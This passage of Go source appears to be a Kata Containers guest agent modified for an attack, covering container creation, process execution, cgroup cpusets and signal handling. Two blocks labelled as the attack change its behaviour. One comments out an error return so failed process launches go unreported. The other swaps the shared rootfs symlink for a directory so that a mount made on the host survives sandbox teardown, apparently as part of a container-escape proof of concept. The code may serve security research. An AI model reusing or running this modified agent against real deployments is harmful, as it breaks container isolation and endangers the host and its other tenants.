cpuset:'%s': %v\", 
cpusetCpusParentPath, cpusetGuest, err)\n\t\t}\n\n\t\t// add cgroup path to the cookies.\n\t\tcookies[cgroupParentPath] = true\n\t}\n\n\t// Finally, update the cgroup path with the requested value.\n\tcpusetCpusPath := filepath.Join(cgroupCpusetPath, cgroupPath, \"cpuset.cpus\")\n\n\tagentLog.WithField(\"path\", cpusetCpusPath).Debug(\"updating cpuset cgroup\")\n\n\tif err := ioutil.WriteFile(cpusetCpusPath, []byte(newCpuset), cpusetMode); err != nil {\n\t\treturn fmt.Errorf(\"Could not update cpuset cgroup (%s) cpuset:'%s': %v\", cpusetCpusPath, newCpuset, err)\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) onlineCPUMem(req *pb.OnlineCPUMemRequest) error {\n\tif req.NbCpus == 0 && req.CpuOnly {\n\t\treturn handleError(req.Wait, fmt.Errorf(\"requested number of CPUs '%d' must be greater than 0\", req.NbCpus))\n\t}\n\n\t// We are going to update the containers of the sandbox, so we have to lock it\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\tif req.NbCpus > 0 {\n\t\tagentLog.WithField(\"vcpus-to-connect\", req.NbCpus).Debug(\"connecting vCPUs\")\n\t\tif err := onlineCPUResources(req.NbCpus); err != nil {\n\t\t\treturn handleError(req.Wait, err)\n\t\t}\n\t}\n\n\tif !req.CpuOnly {\n\t\tif err := onlineMemResources(); err != nil {\n\t\t\treturn handleError(req.Wait, err)\n\t\t}\n\t}\n\n\t// At this point all CPUs have been connected, we need to know\n\t// the actual range of CPUs\n\tconnectedCpus, err := getCpusetGuest()\n\tif err != nil {\n\t\treturn handleError(req.Wait, fmt.Errorf(\"Could not get the actual range of connected CPUs: %v\", err))\n\t}\n\tagentLog.WithField(\"range-of-vcpus\", connectedCpus).Debug(\"connecting vCPUs\")\n\n\tcookies := make(cookie)\n\n\t// Now that we know the actual range of connected CPUs, we need to iterate over\n\t// all containers and update each cpuset cgroup. 
This is not required in docker\n\t// containers since they don't hot add/remove CPUs.\n\tfor _, c := range a.sandbox.containers {\n\t\tagentLog.WithField(\"container\", c.container.ID()).Debug(\"updating cpuset cgroup\")\n\t\tcontConfig := c.container.Config()\n\t\tcgroupPath := contConfig.Cgroups.Path\n\n\t\t// In order to avoid issues updating the container cpuset cgroup, its cpuset cgroup *parents*\n\t\t// MUST BE updated, otherwise we'll get the following errors:\n\t\t// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: permission denied\n\t\t// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: device or resource busy\n\t\t// NOTE: updating container cpuset cgroup *parents* won't affect container cpuset cgroup, for example if container cpuset cgroup has \"0\"\n\t\t// and its cpuset cgroup *parents* have \"0-5\", the container will be able to use only CPU 0.\n\n\t\t// Containers with an assigned cpuset are not updated; we only update their parents.\n\t\tif contConfig.Cgroups.Resources.CpusetCpus != \"\" {\n\t\t\tagentLog.WithField(\"cpuset\", contConfig.Cgroups.Resources.CpusetCpus).Debug(\"updating container cpuset cgroup parents\")\n\t\t\t// remove container cgroup directory\n\t\t\tcgroupPath = filepath.Dir(cgroupPath)\n\t\t}\n\n\t\tif err := updateCpusetPath(cgroupPath, connectedCpus, cookies); err != nil {\n\t\t\treturn handleError(req.Wait, err)\n\t\t}\n\t}\n\n\treturn nil\n}\n\nfunc setConsoleCarriageReturn(fd int) error {\n\ttermios, err := unix.IoctlGetTermios(fd, unix.TCGETS)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttermios.Oflag |= unix.ONLCR\n\n\treturn unix.IoctlSetTermios(fd, unix.TCSETS, termios)\n}\n\nfunc buildProcess(agentProcess *pb.Process, procID string, init bool) (*process, error) {\n\tuser := agentProcess.User.Username\n\tif user == \"\" {\n\t\t// We can specify the user and the group separated by \":\"\n\t\tuser = fmt.Sprintf(\"%d:%d\", agentProcess.User.UID, agentProcess.User.GID)\n\t}\n\n\tadditionalGids := []string{}\n\tfor _, gid := range 
agentProcess.User.AdditionalGids {\n\t\tadditionalGids = append(additionalGids, fmt.Sprintf(\"%d\", gid))\n\t}\n\n\tproc := &process{\n\t\tid: procID,\n\t\tprocess: libcontainer.Process{\n\t\t\tCwd:              agentProcess.Cwd,\n\t\t\tArgs:             agentProcess.Args,\n\t\t\tEnv:              agentProcess.Env,\n\t\t\tUser:             user,\n\t\t\tAdditionalGroups: additionalGids,\n\t\t\tInit:             init,\n\t\t},\n\t}\n\n\tif agentProcess.Terminal {\n\t\tparentSock, childSock, err := utils.NewSockPair(\"console\")\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tproc.process.ConsoleSocket = childSock\n\t\tproc.consoleSock = parentSock\n\n\t\tepoller, err := newEpoller()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tproc.epoller = epoller\n\n\t\treturn proc, nil\n\t}\n\n\trStdin, wStdin, err := os.Pipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trStdout, wStdout, err := os.Pipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trStderr, wStderr, err := os.Pipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tproc.process.Stdin = rStdin\n\tproc.process.Stdout = wStdout\n\tproc.process.Stderr = wStderr\n\n\tproc.stdin = wStdin\n\tproc.stdout = rStdout\n\tproc.stderr = rStderr\n\n\treturn proc, nil\n}\n\nfunc (a *agentGRPC) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) {\n\treturn &pb.HealthCheckResponse{Status: pb.HealthCheckResponse_SERVING}, nil\n}\n\nfunc (a *agentGRPC) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) {\n\treturn &pb.VersionCheckResponse{\n\t\tGrpcVersion:  pb.APIVersion,\n\t\tAgentVersion: a.version,\n\t}, nil\n\n}\n\nfunc (a *agentGRPC) getContainer(cid string) (*container, error) {\n\tif !a.sandbox.running {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"Sandbox not started\")\n\t}\n\n\tctr, err := a.sandbox.getContainer(cid)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ctr, nil\n}\n\n// Shared function 
between CreateContainer and ExecProcess, because those expect\n// a process to be run.\nfunc (a *agentGRPC) execProcess(ctr *container, proc *process, createContainer bool) (err error) {\n\tif ctr == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Container cannot be nil\")\n\t}\n\n\tif proc == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Process cannot be nil\")\n\t}\n\n\t// This lock is very important to avoid any race with reaper.reap().\n\t// Indeed, if we don't lock this here, we could potentially get the\n\t// SIGCHLD signal before the channel has been created, meaning we will\n\t// miss the opportunity to get the exit code, leading WaitProcess() to\n\t// wait forever on the new channel.\n\t// This lock has to be taken before we run the new process.\n\ta.sandbox.subreaper.lock()\n\tdefer a.sandbox.subreaper.unlock()\n\n\tif createContainer {\n\t\terr = ctr.container.Start(&proc.process)\n\t} else {\n\t\terr = ctr.container.Run(&(proc.process))\n\t}\n\n\t// ~ Attack Start ~ //\n\n\t// Commenting out the following code so that we won't send back a failure\n\n\t//// if err != nil {\n\t//// \treturn grpcStatus.Errorf(codes.Internal, \"Could not run process: %v\", err)\n\t//// }\n\n\t// ~ Attack End ~ //\n\n\t// Get process PID\n\tpid, err := proc.process.Pid()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tproc.exitCodeCh = make(chan int, 1)\n\n\t// Create process channel to allow WaitProcess to wait on it.\n\t// This channel is buffered so that reaper.reap() will not\n\t// block until WaitProcess listen onto this channel.\n\ta.sandbox.subreaper.setExitCodeCh(pid, proc.exitCodeCh)\n\n\treturn nil\n}\n\n// Shared function between CreateContainer and ExecProcess, because those expect\n// the console to be properly setup after the process has been started.\nfunc (a *agentGRPC) postExecProcess(ctr *container, proc *process) error {\n\tif ctr == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Container cannot be nil\")\n\t}\n\n\tif 
proc == nil {\n\t\treturn grpcStatus.Error(codes.InvalidArgument, \"Process cannot be nil\")\n\t}\n\n\tdefer proc.closePostStartFDs()\n\n\t// Setup terminal if enabled.\n\tif proc.consoleSock != nil {\n\t\ttermMaster, err := utils.RecvFd(proc.consoleSock)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := setConsoleCarriageReturn(int(termMaster.Fd())); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tproc.termMaster = termMaster\n\n\t\t// Get process PID\n\t\tpid, err := proc.process.Pid()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ta.sandbox.subreaper.setEpoller(pid, proc.epoller)\n\n\t\tif err = proc.epoller.add(proc.termMaster); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tctr.setProcess(proc)\n\n\treturn nil\n}\n\n// This function updates the container namespaces configuration based on the\n// sandbox information. When the sandbox is created, it can be setup in a way\n// that all containers will share some specific namespaces. This is the agent\n// responsibility to create those namespaces so that they can be shared across\n// several containers.\n// If the sandbox has not been setup to share namespaces, then we assume all\n// containers will be started in their own new namespace.\n// The value of a.sandbox.sharedPidNs.path will always override the namespace\n// path set by the spec, since we will always ignore it. 
Indeed, it makes no\n// sense to rely on the namespace path provided by the host since namespaces\n// are different inside the guest.\nfunc (a *agentGRPC) updateContainerConfigNamespaces(config *configs.Config, ctr *container) {\n\tvar ipcNs, utsNs bool\n\n\tfor idx, ns := range config.Namespaces {\n\t\tif ns.Type == configs.NEWIPC {\n\t\t\tconfig.Namespaces[idx].Path = a.sandbox.sharedIPCNs.path\n\t\t\tipcNs = true\n\t\t}\n\n\t\tif ns.Type == configs.NEWUTS {\n\t\t\tconfig.Namespaces[idx].Path = a.sandbox.sharedUTSNs.path\n\t\t\tutsNs = true\n\t\t}\n\t}\n\n\tif !ipcNs {\n\t\tnewIPCNs := configs.Namespace{\n\t\t\tType: configs.NEWIPC,\n\t\t\tPath: a.sandbox.sharedIPCNs.path,\n\t\t}\n\t\tconfig.Namespaces = append(config.Namespaces, newIPCNs)\n\t}\n\n\tif !utsNs {\n\t\tnewUTSNs := configs.Namespace{\n\t\t\tType: configs.NEWUTS,\n\t\t\tPath: a.sandbox.sharedUTSNs.path,\n\t\t}\n\t\tconfig.Namespaces = append(config.Namespaces, newUTSNs)\n\t}\n\n\t// Update PID namespace.\n\tvar pidNsPath string\n\n\t// Use shared pid ns if useSandboxPidns has been set in either\n\t// the CreateSandbox request or CreateContainer request.\n\t// Else set this to empty string so that a new pid namespace is\n\t// created for the container.\n\tif ctr.useSandboxPidNs || a.sandbox.sandboxPidNs {\n\t\tpidNsPath = a.sandbox.sharedPidNs.path\n\t} else {\n\t\tpidNsPath = \"\"\n\t}\n\n\tnewPidNs := configs.Namespace{\n\t\tType: configs.NEWPID,\n\t\tPath: pidNsPath,\n\t}\n\tconfig.Namespaces = append(config.Namespaces, newPidNs)\n}\n\nfunc (a *agentGRPC) updateContainerConfigPrivileges(spec *specs.Spec, config *configs.Config) error {\n\tif spec == nil || spec.Process == nil {\n\t\t// Don't throw an error in case the Spec does not contain any\n\t\t// information about NoNewPrivileges.\n\t\treturn nil\n\t}\n\n\t// Add the value for NoNewPrivileges option.\n\tconfig.NoNewPrivileges = spec.Process.NoNewPrivileges\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) updateContainerConfig(spec *specs.Spec, config 
*configs.Config, ctr *container) error {\n\ta.updateContainerConfigNamespaces(config, ctr)\n\treturn a.updateContainerConfigPrivileges(spec, config)\n}\n\n// rollbackFailingContainerCreation rolls back important steps that might have\n// been performed before the container creation failed.\n// - Destroy the container created by libcontainer\n// - Delete the container from the agent internal map\n// - Unmount all mounts related to this container\nfunc (a *agentGRPC) rollbackFailingContainerCreation(ctr *container) {\n\tif ctr.container != nil {\n\t\tctr.container.Destroy()\n\t}\n\n\ta.sandbox.deleteContainer(ctr.id)\n\n\tif err := removeMounts(ctr.mounts); err != nil {\n\t\tagentLog.WithError(err).Error(\"rollback failed removeMounts()\")\n\t}\n}\n\nfunc (a *agentGRPC) finishCreateContainer(ctr *container, req *pb.CreateContainerRequest, config *configs.Config) (resp *gpb.Empty, err error) {\n\tcontainerPath := filepath.Join(libcontainerPath, a.sandbox.id)\n\tfactory, err := libcontainer.New(containerPath, libcontainer.Cgroupfs)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tctr.container, err = factory.Create(req.ContainerId, config)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\tctr.config = *config\n\n\tctr.initProcess, err = buildProcess(req.OCI.Process, req.ExecId, true)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err = a.execProcess(ctr, ctr.initProcess, true); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// Make sure to add the container to the sandbox before calling updateSharedPidNs\n\ta.sandbox.setContainer(ctr.ctx, req.ContainerId, ctr)\n\tif err := a.updateSharedPidNs(ctr); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, a.postExecProcess(ctr, ctr.initProcess)\n}\n\nfunc (a *agentGRPC) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (resp *gpb.Empty, err error) {\n\n\t// ~ Attack Start ~ //\n\n\t// We need to clean up the symlink we created and replace it with a regular directory.\n\t// This 
ensures that upon sandbox tear-down, when the kata-runtime tries to unmount\n\t// the container filesystem, our symlink at '/run/kata-containers/shared/containers/sbx_id/rootfs'\n\t// won't exist anymore, so the mount we performed on the host won't be unmounted\n\trootfs_path := \"/run/kata-containers/shared/containers/\" + a.sandbox.id + \"/rootfs\"\n\tif err := os.Remove(rootfs_path); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack Remove symlink: '%s'\", err)\n\t}\n\tif err := os.Mkdir(rootfs_path, os.FileMode(0755)); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack Mkdir recreate rootfs dir: '%s'\", err)\n\t}\n\n\t// ~ Attack End ~ //\n\n\tif err := a.createContainerChecks(req); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// re-scan PCI bus\n\t// looking for hidden devices\n\tif err = rescanPciBus(); err != nil {\n\t\tagentLog.WithError(err).Warn(\"Could not rescan PCI bus\")\n\t}\n\n\t// Some devices need some extra processing (the ones invoked with\n\t// --device for instance), and that's what this call is doing. It\n\t// updates the devices listed in the OCI spec, so that they actually\n\t// match real devices inside the VM. This step is necessary since we\n\t// cannot predict everything from the caller.\n\tif err = addDevices(ctx, req.Devices, req.OCI, a.sandbox); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// Both rootfs and volumes (invoked with --volume for instance) will\n\t// be processed the same way. 
The idea is to always mount any provided\n\t// storage to the specified MountPoint, so that it will match what's\n\t// inside oci.Mounts.\n\t// After all those storages have been processed, no matter the order\n\t// here, the agent will rely on libcontainer (using the oci.Mounts\n\t// list) to bind mount all of them inside the container.\n\tmountList, err := addStorages(ctx, req.Storages, a.sandbox)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tctr := &container{\n\t\tid:              req.ContainerId,\n\t\tprocesses:       make(map[string]*process),\n\t\tmounts:          mountList,\n\t\tuseSandboxPidNs: req.SandboxPidns,\n\t\tctx:             ctx,\n\t}\n\n\t// In case the container creation failed, make sure we cleanup\n\t// properly by rolling back the actions previously performed.\n\tdefer func() {\n\t\tif err != nil {\n\t\t\ta.rollbackFailingContainerCreation(ctr)\n\t\t}\n\t}()\n\n\t// Convert the spec to an actual OCI specification structure.\n\tociSpec, err := pb.GRPCtoOCI(req.OCI)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.handleCPUSet(ociSpec); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.applyNetworkSysctls(ociSpec); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif a.sandbox.guestHooksPresent {\n\t\t// Add any custom OCI hooks to the spec\n\t\ta.sandbox.addGuestHooks(ociSpec)\n\n\t\t// write the OCI spec to a file so that hooks can read it\n\t\terr = writeSpecToFile(ociSpec)\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\t// Change cwd because libcontainer assumes the bundle path is the cwd:\n\t\t// https://github.com/opencontainers/runc/blob/v1.0.0-rc5/libcontainer/specconv/spec_linux.go#L157\n\t\toldcwd, err := changeToBundlePath(ociSpec)\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t\tdefer os.Chdir(oldcwd)\n\t}\n\n\t// Convert the OCI specification into a libcontainer configuration.\n\tconfig, err := 
specconv.CreateLibcontainerConfig(&specconv.CreateOpts{\n\t\tCgroupName:   req.ContainerId,\n\t\tNoNewKeyring: true,\n\t\tSpec:         ociSpec,\n\t\tNoPivotRoot:  a.sandbox.noPivotRoot,\n\t})\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// apply rlimits\n\tconfig.Rlimits = posixRlimitsToRlimits(ociSpec.Process.Rlimits)\n\n\t// Update libcontainer configuration for specific cases not handled\n\t// by the specconv converter.\n\tif err = a.updateContainerConfig(ociSpec, config, ctr); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn a.finishCreateContainer(ctr, req, config)\n}\n\n// Path overridden in unit tests\nvar procSysDir = \"/proc/sys\"\n\n// writeSystemProperty writes the value to a path under /proc/sys as determined from the key.\n// For example, net.ipv4.ip_forward translates to /proc/sys/net/ipv4/ip_forward.\nfunc writeSystemProperty(key, value string) error {\n\tkeyPath := strings.Replace(key, \".\", \"/\", -1)\n\treturn ioutil.WriteFile(filepath.Join(procSysDir, keyPath), []byte(value), 0644)\n}\n\nfunc isNetworkSysctl(sysctl string) bool {\n\treturn strings.HasPrefix(sysctl, \"net.\")\n}\n\n// libcontainer checks if the container is running in a separate network namespace\n// before applying the network related sysctls. If it sees that the network namespace of the container\n// is the same as the \"host\", it errors out. Since we do not create a new net namespace inside the guest,\n// libcontainer would error out while verifying network sysctls. To overcome this, we don't pass\n// network sysctls to libcontainer; we instead have the agent directly apply them. 
All other namespaced\n// sysctls are applied by libcontainer.\nfunc (a *agentGRPC) applyNetworkSysctls(ociSpec *specs.Spec) error {\n\tsysctls := ociSpec.Linux.Sysctl\n\tfor key, value := range sysctls {\n\t\tif isNetworkSysctl(key) {\n\t\t\tif err := writeSystemProperty(key, value); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdelete(sysctls, key)\n\t\t}\n\t}\n\n\tociSpec.Linux.Sysctl = sysctls\n\treturn nil\n}\n\nfunc (a *agentGRPC) handleCPUSet(ociSpec *specs.Spec) error {\n\tif ociSpec.Linux.Resources.CPU != nil && ociSpec.Linux.Resources.CPU.Cpus != \"\" {\n\t\tavailableCpuset, err := getAvailableCpusetList(ociSpec.Linux.Resources.CPU.Cpus)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tociSpec.Linux.Resources.CPU.Cpus = availableCpuset\n\t}\n\treturn nil\n}\n\nfunc posixRlimitsToRlimits(posixRlimits []specs.POSIXRlimit) []configs.Rlimit {\n\tvar rlimits []configs.Rlimit\n\n\trlimitsMap := map[string]int{\n\t\t\"RLIMIT_CPU\":        unix.RLIMIT_CPU,        // 0x0\n\t\t\"RLIMIT_FSIZE\":      unix.RLIMIT_FSIZE,      // 0x1\n\t\t\"RLIMIT_DATA\":       unix.RLIMIT_DATA,       // 0x2\n\t\t\"RLIMIT_STACK\":      unix.RLIMIT_STACK,      // 0x3\n\t\t\"RLIMIT_CORE\":       unix.RLIMIT_CORE,       // 0x4\n\t\t\"RLIMIT_RSS\":        unix.RLIMIT_RSS,        // 0x5\n\t\t\"RLIMIT_NPROC\":      unix.RLIMIT_NPROC,      // 0x6\n\t\t\"RLIMIT_NOFILE\":     unix.RLIMIT_NOFILE,     // 0x7\n\t\t\"RLIMIT_MEMLOCK\":    unix.RLIMIT_MEMLOCK,    // 0x8\n\t\t\"RLIMIT_AS\":         unix.RLIMIT_AS,         // 0x9\n\t\t\"RLIMIT_LOCKS\":      unix.RLIMIT_LOCKS,      // 0xa\n\t\t\"RLIMIT_SIGPENDING\": unix.RLIMIT_SIGPENDING, // 0xb\n\t\t\"RLIMIT_MSGQUEUE\":   unix.RLIMIT_MSGQUEUE,   // 0xc\n\t\t\"RLIMIT_NICE\":       unix.RLIMIT_NICE,       // 0xd\n\t\t\"RLIMIT_RTPRIO\":     unix.RLIMIT_RTPRIO,     // 0xe\n\t\t\"RLIMIT_RTTIME\":     unix.RLIMIT_RTTIME,     // 0xf\n\t}\n\n\tfor _, l := range posixRlimits {\n\t\tlimit, ok := rlimitsMap[l.Type]\n\t\tif !ok 
{\n\t\t\tagentLog.WithField(\"rlimit\", l.Type).Warnf(\"Unknown rlimit\")\n\t\t\tcontinue\n\t\t}\n\n\t\trl := configs.Rlimit{\n\t\t\tType: limit,\n\t\t\tHard: l.Hard,\n\t\t\tSoft: l.Soft,\n\t\t}\n\t\trlimits = append(rlimits, rl)\n\t}\n\n\treturn rlimits\n}\n\nfunc (a *agentGRPC) createContainerChecks(req *pb.CreateContainerRequest) (err error) {\n\tif !a.sandbox.running {\n\t\treturn grpcStatus.Error(codes.FailedPrecondition, \"Sandbox not started, impossible to run a new container\")\n\t}\n\n\tif _, err = a.sandbox.getContainer(req.ContainerId); err == nil {\n\t\treturn grpcStatus.Errorf(codes.AlreadyExists, \"Container %s already exists, impossible to create\", req.ContainerId)\n\t}\n\n\tif a.pidNsExists(req.OCI) {\n\t\treturn grpcStatus.Errorf(codes.FailedPrecondition, \"Unexpected PID namespace received for container %s, should have been cleared out\", req.ContainerId)\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) pidNsExists(grpcSpec *pb.Spec) bool {\n\tif grpcSpec.Linux != nil {\n\t\tfor _, n := range grpcSpec.Linux.Namespaces {\n\t\t\tif n.Type == string(configs.NEWPID) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t}\n\treturn false\n}\n\nfunc (a *agentGRPC) updateSharedPidNs(ctr *container) error {\n\t// Populate the shared pid path only if this is an infra container and\n\t// SandboxPidns has not been passed in the CreateSandbox request.\n\t// This means a  separate pause process has not been created. 
We treat the\n\t// first container created as the infra container in that case\n\t// and use its pid namespace in case pid namespace needs to be shared.\n\tif !a.sandbox.sandboxPidNs && len(a.sandbox.containers) == 1 {\n\t\tpid, err := ctr.initProcess.process.Pid()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\ta.sandbox.sharedPidNs.path = fmt.Sprintf(\"/proc/%d/ns/pid\", pid)\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) {\n\tctr, err := a.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tstatus, err := ctr.container.Status()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif status != libcontainer.Created {\n\t\treturn nil, grpcStatus.Errorf(codes.FailedPrecondition, \"Container %s status %s, should be %s\", req.ContainerId, status.String(), libcontainer.Created.String())\n\t}\n\n\tif err := ctr.container.Exec(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) {\n\tctr, err := a.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tstatus, err := ctr.container.Status()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif status == libcontainer.Stopped {\n\t\treturn nil, grpcStatus.Errorf(codes.FailedPrecondition, \"Cannot exec in stopped container %s\", req.ContainerId)\n\t}\n\n\tproc, err := buildProcess(req.Process, req.ExecId, false)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.execProcess(ctr, proc, false); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, a.postExecProcess(ctr, proc)\n}\n\nfunc (a *agentGRPC) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) {\n\tif !a.sandbox.running {\n\t\treturn emptyResp, grpcStatus.Error(codes.FailedPrecondition, \"Sandbox not started, impossible to signal 
the container\")\n\t}\n\n\tctr, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, grpcStatus.Errorf(codes.FailedPrecondition, \"Could not signal process %s: %v\", req.ExecId, err)\n\t}\n\n\tstatus, err := ctr.container.Status()\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tsignal := syscall.Signal(req.Signal)\n\n\tif status == libcontainer.Stopped {\n\t\tagentLog.WithFields(logrus.Fields{\n\t\t\t\"containerID\": req.ContainerId,\n\t\t\t\"signal\":      signal.String(),\n\t\t}).Info(\"discarding signal as container stopped\")\n\t\treturn emptyResp, nil\n\t}\n\n\t// If the exec ID provided is empty, let's apply the signal to all\n\t// processes inside the container.\n\t// If the process is the container process, let's use the container\n\t// API for that.\n\t// Frozen processes are thawed when `all` is true, allowing them to receive and process signals.\n\tif req.ExecId == \"\" || status == libcontainer.Paused {\n\t\treturn emptyResp, ctr.container.Signal(signal, true)\n\t} else if ctr.initProcess.id == req.ExecId {\n\t\tpid, err := ctr.initProcess.process.Pid()\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t\t// For container initProcess, if it hasn't installed handler for \"SIGTERM\" signal,\n\t\t// it will ignore the \"SIGTERM\" signal sent to it, thus send it \"SIGKILL\" signal\n\t\t// instead of \"SIGTERM\" to terminate it.\n\t\tif signal == syscall.SIGTERM && !isSignalHandled(pid, syscall.SIGTERM) {\n\t\t\tsignal = syscall.SIGKILL\n\t\t}\n\t\treturn emptyResp, ctr.container.Signal(signal, false)\n\t}\n\n\tproc, err := ctr.getProcess(req.ExecId)\n\tif err != nil {\n\t\treturn emptyResp, grpcStatus.Errorf(grpcStatus.Convert(err).Code(), \"Could not signal process: %v\", err)\n\t}\n\n\tif err := proc.process.Signal(signal); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\n// Check is the container process installed the\n// handler for specific signal.\nfunc 
isSignalHandled(pid int, signum syscall.Signal) bool {\n\tvar sigMask uint64 = 1 << (uint(signum) - 1)\n\tprocFile := fmt.Sprintf(\"/proc/%d/status\", pid)\n\tfile, err := os.Open(procFile)\n\tif err != nil {\n\t\tagentLog.WithField(\"procFile\", procFile).Warn(\"Open proc file failed\")\n\t\treturn false\n\t}\n\tdefer file.Close()\n\n\tscanner := bufio.NewScanner(file)\n\tfor scanner.Scan() {\n\t\tline := scanner.Text()\n\t\tif strings.HasPrefix(line, \"SigCgt:\") {\n\t\t\tmaskSlice := strings.Split(line, \":\")\n\t\t\tif len(maskSlice) != 2 {\n\t\t\t\tagentLog.WithField(\"procFile\", procFile).Warn(\"Parse the SigCgt field failed\")\n\t\t\t\treturn false\n\t\t\t}\n\t\t\tsigCgtStr := strings.TrimSpace(maskSlice[1])\n\t\t\tsigCgtMask, err := strconv.ParseUint(sigCgtStr, 16, 64)\n\t\t\tif err != nil {\n\t\t\t\tagentLog.WithField(\"sigCgt\", sigCgtStr).Warn(\"parse the SigCgt to hex failed\")\n\t\t\t\treturn false\n\t\t\t}\n\t\t\treturn (sigCgtMask & sigMask) == sigMask\n\t\t}\n\t}\n\treturn false\n}\n\nfunc (a *agentGRPC) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {\n\tproc, ctr, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn &pb.WaitProcessResponse{}, err\n\t}\n\n\tdefer proc.Do(func() {\n\t\tproc.closePostExitFDs()\n\t\tctr.deleteProcess(proc.id)\n\t})\n\n\t// Using helper function wait() to deal with the subreaper.\n\tlibContProcess := (*reaperLibcontainerProcess)(&(proc.process))\n\texitCode, err := a.sandbox.subreaper.wait(proc.exitCodeCh, libContProcess)\n\tif err != nil {\n\t\treturn &pb.WaitProcessResponse{}, err\n\t}\n\t//refill the exitCodeCh with the exitcode which can be read out\n\t//by another WaitProcess(). 
Since this channel isn't closed,\n\t//here the refill will always succeed and it will be freed by GC\n\t//once the process exits.\n\tproc.exitCodeCh <- exitCode\n\n\treturn &pb.WaitProcessResponse{\n\t\tStatus: int32(exitCode),\n\t}, nil\n}\n\nfunc getPIDIndex(title string) int {\n\t// looking for PID field in ps title\n\tfields := strings.Fields(title)\n\tfor i, f := range fields {\n\t\tif f == \"PID\" {\n\t\t\treturn i\n\t\t}\n\t}\n\treturn -1\n}\n\nfunc (a *agentGRPC) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {\n\tresp := &pb.ListProcessesResponse{}\n\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn resp, err\n\t}\n\n\t// Get the list of processes that are running inside the containers.\n\t// the PIDs match with the system PIDs, not with container's namespace\n\tpids, err := c.container.Processes()\n\tif err != nil {\n\t\treturn resp, err\n\t}\n\n\tswitch req.Format {\n\tcase \"table\":\n\tcase \"json\":\n\t\tresp.ProcessList, err = json.Marshal(pids)\n\t\treturn resp, err\n\tdefault:\n\t\treturn resp, fmt.Errorf(\"invalid format option\")\n\t}\n\n\tpsArgs := req.Args\n\tif len(psArgs) == 0 {\n\t\tpsArgs = []string{\"-ef\"}\n\t}\n\n\t// All container's processes are visible from the agent's namespace.\n\t// pids already contains the list of processes that are running\n\t// inside a 